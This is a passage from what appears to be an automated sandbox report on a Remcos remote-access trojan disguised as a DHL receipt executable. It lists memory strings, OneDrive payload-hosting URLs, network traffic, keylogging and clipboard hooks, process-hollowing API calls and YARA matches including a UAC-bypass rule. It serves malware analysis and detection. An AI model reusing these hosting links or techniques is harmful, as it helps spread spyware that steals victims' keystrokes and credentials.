Source: bhvC179.tmp.20.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhvC179.tmp.20.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000614000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: remcos.exe, 00000014.00000003.1855309456.000000000070D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=0000
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhvC179.tmp.20.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: remcos.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhvC179.tmp.20.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: remcos.exe, 00000029.00000002.1940219819.0000000000718000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
Source: remcos.exe, 0000002C.00000002.2022678226.000000000289C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhvC179.tmp.20.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/D
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/J
Source: remcos.exe, 0000002C.00000002.2020797857.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyvTlU4
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51D0_4
Source: remcos.exe, 00000005.00000003.2495195911.0000000000608000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.000000000063D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4124047800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000638000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANiSqtd
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6RM5sx
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com/y4myOimuUAmzYYCQg7S5DPHrV2LTkb-aNzDgiFFvLFPMKX5riRJbzax3M8WqO_jLV-z
Source: remcos.exe, 0000002C.00000002.2020797857.000000000081C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mLgHdonCx5W54HXtDkl0peFnfB2dNJH6LZGfHmHwINzKd8xpfh2xvcRVLcQyv
Source: remcos.exe, 00000029.00000002.1940219819.000000000078F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mNE6BoTh_GBm8Q4wbnKJ7Li2FLqma7FJ080xsTC4pC8QEGyWnm5znLRCbk_51
Source: remcos.exe, 00000005.00000002.4124047800.0000000000647000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mRG-3oYfzeltQECXYM1j_yAY-QqhbV4uB_5qD604rmUO1bM0WiwTYLkGtnANi
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ppeppa.db.files.1drv.com:443/y4mnmElJQmfVNfndkI9SZphKQ6LfFP4h6K91h8VzvaKMKPoB-EpIdFAeQYlMk6R
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvC179.tmp.20.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvC179.tmp.20.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhvC179.tmp.20.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: bhvC179.tmp.20.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhvC179.tmp.20.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhvC179.tmp.20.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: remcos.exe, 00000016.00000002.1820672568.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: remcos.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvC179.tmp.20.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4A2B8 SetWindowsHookExA 0000000D,2DA4A2A4,00000000 0_2_2DA4A2B8
Source: C:\ProgramData\Remcos\remcos.exe Windows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exe
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA56940 OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_2DA56940
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA568C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 0_2_2DA568C1
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 20_2_0040987A
Source: C:\ProgramData\Remcos\remcos.exe Code function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 20_2_004098E2
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 0_2_2DA4A3E0
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5C9E2 SystemParametersInfoW, 0_2_2DA5C9E2
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5BC9E2 SystemParametersInfoW, 5_2_2D5BC9E2
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: initial sample Static PE information: Filename: DHL119040 receipt document,pdf.exe
Source: C:\ProgramData\Remcos\remcos.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B81B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_028BC7B4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_028BC724
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory, 0_2_028B7A94
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BDA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess, 0_2_028BDA24
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_028BC898
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess, 0_2_028BD9A4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_028B7944
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B81B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B6
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_028BC6AC
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BC7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_028BC7B2
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory, 0_2_028B7A92
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_028B7942
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5BB35 OpenProcess,NtResumeProcess,CloseHandle, 0_2_2DA5BB35
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5BB09 OpenProcess,NtSuspendProcess,CloseHandle, 0_2_2DA5BB09
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 0_2_2DA532D2
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028F7A94 NtWriteVirtualMemory, 5_2_028F7A94
Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_028FDA24 NtQueryInformationProcess, 5_2_028FDA24
